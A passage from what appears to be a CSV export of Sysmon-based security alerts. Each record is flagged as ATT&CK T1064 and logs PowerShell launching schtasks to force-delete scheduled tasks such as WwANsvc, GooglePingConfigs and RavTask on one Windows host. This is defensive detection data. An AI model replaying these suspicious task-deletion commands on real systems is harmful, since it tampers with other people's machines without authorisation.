Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.197",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.882 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001014b31e00} +ProcessId: 7136 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WwANsvc /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.890380300Z"",""eventRecordID"":""2514"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.882\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001014b31e00}\r\nProcessId: 7136\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WwANsvc /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.882"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001014b31e00}"",""processId"":""7136"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WwANsvc /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.181",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.851 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00105bb11e00} +ProcessId: 7244 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN MiscfostNsi /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.854574600Z"",""eventRecordID"":""2513"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.851\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00105bb11e00}\r\nProcessId: 7244\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN MiscfostNsi /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.851"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00105bb11e00}"",""processId"":""7244"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN MiscfostNsi /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.166",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.826 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00109caf1e00} +ProcessId: 7984 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HomeGroupProvider /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.838813700Z"",""eventRecordID"":""2512"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.826\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00109caf1e00}\r\nProcessId: 7984\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.826"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00109caf1e00}"",""processId"":""7984"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HomeGroupProvider /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.136",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.798 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001069ad1e00} +ProcessId: 3532 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN GooglePingConfigs /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.799967700Z"",""eventRecordID"":""2511"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.798\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001069ad1e00}\r\nProcessId: 3532\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.798"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001069ad1e00}"",""processId"":""3532"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN GooglePingConfigs /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.118",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.774 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010a6ab1e00} +ProcessId: 3440 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN RavTask /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.776531100Z"",""eventRecordID"":""2510"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.774\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010a6ab1e00}\r\nProcessId: 3440\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.774"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010a6ab1e00}"",""processId"":""3440"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN RavTask /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:33.107",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.748 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010e8a91e00} +ProcessId: 1676 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Flash /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.762698700Z"",""eventRecordID"":""2509"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.748\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010e8a91e00}\r\nProcessId: 1676\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.748"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010e8a91e00}"",""processId"":""1676"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Flash /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 